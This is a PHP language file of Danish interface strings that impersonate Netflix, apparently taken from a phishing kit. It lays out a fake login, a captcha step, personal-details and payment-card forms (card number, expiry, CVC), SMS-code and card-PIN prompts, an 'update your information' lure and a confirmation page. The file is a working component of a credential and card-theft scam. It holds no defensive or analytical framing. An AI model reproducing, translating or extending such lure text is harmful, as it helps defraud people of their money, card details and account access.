<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "da",
        "xcapt" => "Tag et øjeblik for at løse hCaptcha nedenfor. Det hjælper os med at sikre, at du er en ægte bruger og ikke en robot, og giver en sikker miljø for alle.",
        "xcapt1" => "Venligst markér CAPTCHA-boksen.",
        "xcapt2" => "Verifikation",
        "xcapt3" => "Fortsæt",
        "xmain1" => "Log ind",
        "xmain2" => "E-mail eller telefonnummer",
        "xmain3" => "Indtast venligst en gyldig e-mail eller et telefonnummer.",
        "xmain4" => "Adgangskode",
        "xmain5" => "Din adgangskode skal indeholde mellem 4 og 60 tegn.",
        "xmain6" => "Log ind",
        "xmain7" => "Husk mig",
        "xmain8" => "Brug for hjælp?",
        "xmain9" => "Ny på Netflix?",
        "xmain10" => " Tilmeld dig nu.",
        "xmain11" => "Denne side er beskyttet af Google reCAPTCHA for at sikre, at du ikke er en robot.",
        "xmain12" => "Læs mere.",
        "xinfoz1" => "Personlige oplysninger",
        "xinfoz2" => "Fornavn og efternavn",
        "xinfoz3" => "Dette felt er obligatorisk.",
        "xinfoz4" => "Fødselsdato",
        "xinfoz5" => "Adresse",
        "xinfoz6" => "By",
        "xinfoz7" => "Postnummer",
        "xinfoz8" => "E-mail-adresse",
        "xinfoz9" => "Telefonnummer",
        "xinfoz10" => "Felterne i denne formular er påkrævet, da vi har brug for disse oplysninger for at behandle din anmodning.",
        "xinfoz11" => "Fortsæt",
        "xpay1" => "Opsæt dit betalingskort",
        "xpay2" => "Kortnummer",
        "xpay3" => "Kortnummer påkrævet.",
        "xpay4" => "Udløbsdato",
        "xpay5" => "Udløbsdato påkrævet.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV påkrævet.",
        "xpay8" => "End-to-end krypteret",
        "xpay9" => "Fortsæt",
        "xsms1" => "Verifikation",
        "xsms2" => "Af sikkerhedsmæssige årsager skal vi sikre os, at det virkelig er dig.",
        "xsms3" => "Vi sender dig en SMS med en sikkerhedskode",
        "xsms4" => "Indtast venligst den modtagne kode",
        "xsms5" => "SMS-kode",
        "xsms6" => "Ugyldig SMS-kode",
        "xsms7" => "Dette trin er nødvendigt for at behandle din anmodning sikkert.",
        "xsms8" => "Fortsæt",
        "xpin1" => "Verifikation",
        "xpin2" => "Af sikkerhedsmæssige årsager skal vi sikre os, at det virkelig er dig.",
        "xpin3" => "Vi sender dig en SMS med en sikkerhedskode",
        "xpin4" => "Indtast venligst din kort-PIN-kode",
        "xpin5" => "PIN-kode",
        "xpin6" => "Ugyldig PIN-kode",
        "xpin7" => "Dette trin er nødvendigt for at behandle din anmodning sikkert.",
        "xpin8" => "Fortsæt",
        "xexpl1" => "Opdatering",
        "xexpl2" => "Vi håber, at denne kommunikation finder dig godt. Vi vil gerne informere dig om, at det er essentielt at opdatere dine oplysninger på vores platform for at sikre en kontinuerlig og sikker brugeroplevelse.",
        "xexpl3" => "For at forbedre vores tjenester og sikre kontoens sikkerhed beder vi dig tage et øjeblik for at opdatere dine oplysninger.",
        "xexpl4" => "Fortsæt",
        "xconf1" => "Bekræftelse",
        "xconf2" => "Vi takker dig oprigtigt for at have taget dig tid til at opdatere dine oplysninger på vores platform. Dit engagement for sikkerheden og nøjagtigheden af dine kontodetaljer er afgørende for os.",
        "xconf3" => "Dine ændringer er blevet gemt med succes. Du kan nu fuldt ud nyde vores platform med de nyeste og opdaterede oplysninger.",
        "xconf4" => "Fortsæt",
        "xload1" => "Behandling pågår...",
        "xload2" => "Forlad ikke denne side.",
        "xfoot1" => "Spørgsmål? Kontakt os.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Hjælpecenter",
        "xfoot4" => "Brugsbetingelser",
        "xfoot5" => "Privatlivspolitik",
        "xfoot6" => "Cookie-præferencer",
        "xfoot7" => "Virksomhedsoplysninger",
        "xfoot8" => "Dansk"
    );

    return $lang[$phrase];
}
?>
